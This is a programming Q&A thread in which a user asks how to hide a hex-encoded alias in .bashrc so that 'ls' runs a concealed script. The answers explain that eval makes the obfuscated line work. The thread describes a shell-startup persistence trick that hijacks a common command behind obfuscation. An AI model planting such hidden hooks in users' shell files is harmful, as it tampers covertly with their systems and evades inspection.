# Quotes between backquotes and weird behavior

Tags: bash

I'm trying to inject an hidden alias in .bashrc (for educational purpose ;)) and thus I 'encrypt' this using echo and the hexadecimal notation. For example :

```
$ head -n13 .bashrc|tail -n1
`echo -e '\x61\x6c\x69\x61\x73\x20\x6c\x73\x3d\x22\x7e\x2f\x2e\x66\x75\x63\x6b\x2e\x73\x68\x20\x2d\x6c\x22'`
```

The echo without backquotes works :

```
$ echo -e '\x61\x6c\x69\x61\x73\x20\x6c\x73\x3d\x22\x7e\x2f\x2e\x66\x75\x63\x6b\x2e\x73\x68\x20\x2d\x6c\x22'
alias ls="~/.f###.sh -l"
```

Yet, if I put this command between backquotes, it doesn't work and I can't figure out why :

```
$ `echo -e '\x61\x6c\x69\x61\x73\x20\x6c\x73\x3d\x22\x7e\x2f\x2e\x66\x75\x63\x6b\x2e\x73\x68\x20\x2d\x6c\x22'`
bash: alias: -l" : not found
$ alias ls
alias ls='"~/.f###.sh'
```

I need your help !

Answer (score 4, accepted):

You are missing an `eval`! That works:

```
$ eval `echo -e '\x61\x6c\x69\x61\x73\x20\x6c\x73\x3d\x22\x7e\x2f\x2e\x66\x75\x63\x6b\x2e\x73\x68\x20\x2d\x6c\x22'`
```

let's see:

```
$ alias ls
alias ls='~/.fuck.sh -l'
```

Without the `eval` you have the problem, that `bash` thinks all that is returned from the backtics-command is the binary you want to execute. In your case it is the "binary" (`alias`) plus arguments. If you want the string to be parsed and executed as regular shell input use `eval` :-)

Answer (score 2):

You want

```
eval `echo -e '\x61\x6c\x69\x61\x73\x20\x6c\x73\x3d\x22\x7e\x2f\x2e\x66\x5f\x5f\x6b\x2e\x73\x68\x20\x2d\x6c\x22'`
```

*note I changed the alias to not contain explicit language* :)

Comment: Because of the order in which expansions are done in the shell. I see Johannes actually mentions it, I hope that is enough explanation :)